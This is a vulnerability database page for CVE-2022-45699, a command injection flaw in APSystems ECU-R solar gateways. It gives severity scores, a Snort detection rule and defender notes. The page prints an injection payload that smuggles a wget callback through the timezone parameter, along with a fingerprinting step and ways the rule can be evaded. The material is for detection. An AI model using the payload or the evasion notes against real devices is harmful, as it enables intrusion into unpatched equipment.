cbcvebase.
CVE-2022-45699
published 2023-02-10

CVE-2022-45699: Command injection in the administration interface in APSystems ECU-R version 5203 allows a remote unauthenticated attacker to execute arbitrary commands as…

PriorityP192critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
76.60%
99.5th percentile
Command injection in the administration interface in APSystems ECU-R version 5203 allows a remote unauthenticated attacker to execute arbitrary commands as root using the timezone parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
apsystemsecu-r_firmware

Detection & IOCsextracted from sources · hover to see the quote

url/index.php/management/set_timezone
commandtimezone=;wget+{{interactsh-url}};#
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS APsystems ECU-R Command Inject Attempt (CVE-2022-45699)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:34; content:"/index.php/management/set_timezone"; fast_pattern; http.request_body; content:"timezone|3d|"; pcre:"/^[^\x26]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/; reference:cve,2022-45699; classtype:attempted-admin; sid:2057254; rev:1; metadata:attack_target Networking_Equipment, tls_state plaintext, created_at 2024_11_05, cve CVE_2022_45699, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2024_11_05, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Fingerprint the target by checking for the string 'Altenergy Power Control Software' in the HTTP response body of the root path before attempting exploitation.
  • Exploit traffic is unauthenticated (no session/auth headers required) — a POST to /index.php/management/set_timezone with a timezone parameter containing shell metacharacters (;, newline, backtick, pipe, $) is the attack pattern.
  • The Snort/Suricata rule matches on: POST method + URI bsize exactly 34 bytes (/index.php/management/set_timezone) + request body containing 'timezone=' followed by shell injection metacharacters (;/%3B, newline/%0A, backtick/%60, pipe/%7C, dollar/%24).
  • This CVE has been linked to Mirai botnet variant exploitation in the wild; monitor for subsequent outbound wget/curl callbacks or bot enrollment traffic after a successful injection.
  • ·The Snort rule (sid:2057254) specifies tls_state plaintext — it will NOT fire on TLS-encrypted traffic. Ensure the sensor is positioned where plaintext HTTP is visible.
  • ·The URI match uses bsize:34 (exact byte-length match on the URI), meaning URL-encoded or path-varied requests may evade this specific rule.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.